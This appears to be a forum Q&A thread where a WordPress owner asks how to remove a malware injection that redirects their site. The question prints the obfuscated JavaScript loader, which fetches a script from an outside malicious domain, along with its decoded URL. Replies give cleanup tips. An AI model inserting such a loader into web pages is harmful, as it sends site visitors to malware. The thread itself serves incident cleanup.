# Remove Two Lines of JS Code at the Beginning of Every Document on Wordpress

Tags: javascript, php, jquery, wordpress, malware

My website is redirecting to a malware website and I have identified that at the beginning of every page there is a code. See below -

```
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
```

I translated this to this -

```
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=060 s.src=pl;
```

But this code is on every single Javascript file, index.php, and many other PHP files. How can I get rid of this script which is redirecting my page?

I tried several things but nothing is working. Also, I am not able to log in to the WordPress dashboard as the URL will keep redirecting. No matter what URL I use, I always end up redirecting.

Please help me with this. I am trying for over a week now and nothing fruitful came my way.

Comment: Disable all plugins, then enable them one by one and see which one is causing this behaviour.

Answer (score 1, accepted):

Download your files locally.

[image]
Use Notepad++ `"Find in files"` ( <kbd>CTRL</kbd>+<kbd>SHIFT</kbd>+<kbd>F</kbd> for Find in Files) to do a mass find and replace. You can do it for every single file at once and just re-upload your files. Use the settings I put into the screenshot here.

Couldn't hurt to block the URL in your firewall for good measure.

Also, if you see this file in the root directory, delete it: `wp-craft-report-conf.php`

Comment: Thats the hard way and I want to find the real plug where this was planted. So that once that is blown, all these lines go away from all files. Isthere a way to do that?

Comment: It could be any plugin technically, this happens a lot with `Adminer` though if you have that one. Other than that you will have to do it this way or write a script which is even more work than this method.

Comment: I checked and could find out that this is some malware.injection/68. Is that not something familiar for which we can find the real reason? I also found a few new user accounts under the Users table in phpmyadmin

Comment: You can try but hacking methods change daily and I can't give you a solid answer for finding the affected plugin. I offered a tip as to a likely candidate but we aren't going to know for sure. Just remove the malware lines and see if they come back. One other thing you can try is a wordpress malware scanner. As it stands I have answered your original question on how to fix.

Comment: What all files I should download? The malware is everywhere, all JS and Index files. Whats the best way to download and safely replace without disturbing anything? Also what url to block and how to do it ?

Comment: The URL to block is trasnaltemyrecords.com. the only good this does is prevent redirect for YOU. For what files, I would do all of them, every single one. In the "filters" in the screenshot above, leave the filter at `*.*` and this will find and replace for every single file all at once and should only take like 2 seconds.

Comment: There is a tool called "Brackets" (it's an open-source code editor) for mac which has the same function. It also has the same shortcut to bring it up. CTRL+SHIFT+F. You can do a find in files this way on Mac. (If that doesn't do it, you can use "Sublime Text" to do the same thing, again CTRL+SHIFT+F for find in files.